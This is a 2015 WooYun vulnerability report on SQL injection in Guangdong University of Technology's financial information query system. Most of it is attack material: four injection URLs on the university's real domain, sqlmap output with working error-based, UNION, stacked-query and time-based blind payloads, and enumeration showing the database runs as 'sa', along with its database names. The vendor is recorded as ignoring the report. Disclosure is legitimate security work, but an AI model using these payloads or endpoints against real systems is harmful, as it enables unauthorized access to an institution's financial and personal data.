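Vulnerability summary
Bug ID: wooyun-2015-091360
Title: SQL injection in the Guangdong University of Technology financial information query system (four injection points)
Vendor: Guangdong University of Technology
Author: YuShen
Submitted: 2015-01-14 12:50
Fixed: 2015-01-19 12:52
Disclosed: 2015-01-19 12:52
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 15
Status: Handed over to a third-party partner organization (CCERT, the education network emergency response team) for handling
Source: http://www.wooyun.org
Tags: none
Vulnerability details
Disclosure status:
2015-01-14: Details reported to the vendor; waiting for the vendor to handle them
2015-01-19: The vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
SQL injection
Detailed description:
SQL injection!
Proof of vulnerability:
Injection points: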
http://cwc.gdut.edu.cn/cwwj/cwwj.asp?lx=%C4%BC
http://cwc.gdut.edu.cn/fwzn/fwzn.asp?lx=%D6%B0
http://cwc.gdut.edu.cn/gzzd/showinfo.asp?ID=41
http://cwc.gdut.edu.cn/gg/showinfo.asp?id=605
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: lx
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lx=%C4%BC' AND 2584=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(121)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2584=2584) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(114)+CHAR(113))) AND 'iBct'='iBct
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: lx=%C4%BC' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(112)+CHAR(121)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(84)+CHAR(89)+CHAR(71)+CHAR(74)+CHAR(103)+CHAR(88)+CHAR(88)+CHAR(71)+CHAR(103)+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(114)+CHAR(113),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: lx=%C4%BC'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: lx=%C4%BC' AND 3203=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Orwo'='Orwo
---
[13:54:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2005
[13:54:19] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\cwc.gdut.edu.cn'
[*] shutting down at 13:54:19
current user: 'sa'
current database: 'oa88'
available databases [6]:
[*] master
[*] model
[*] msdb
[*] oa88
[*] tempdb
[*] ykt
Database: oa88
[92 tables]
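Suggested fix:
Filter the input!
Copyright notice: when reposting, please credit the source YuShen@WooYun
Vulnerability response
Vendor response:
Severity: no impact, ignored by vendor
Ignored at: 2015-01-19 12:52
Vendor reply:
Latest status:
None yet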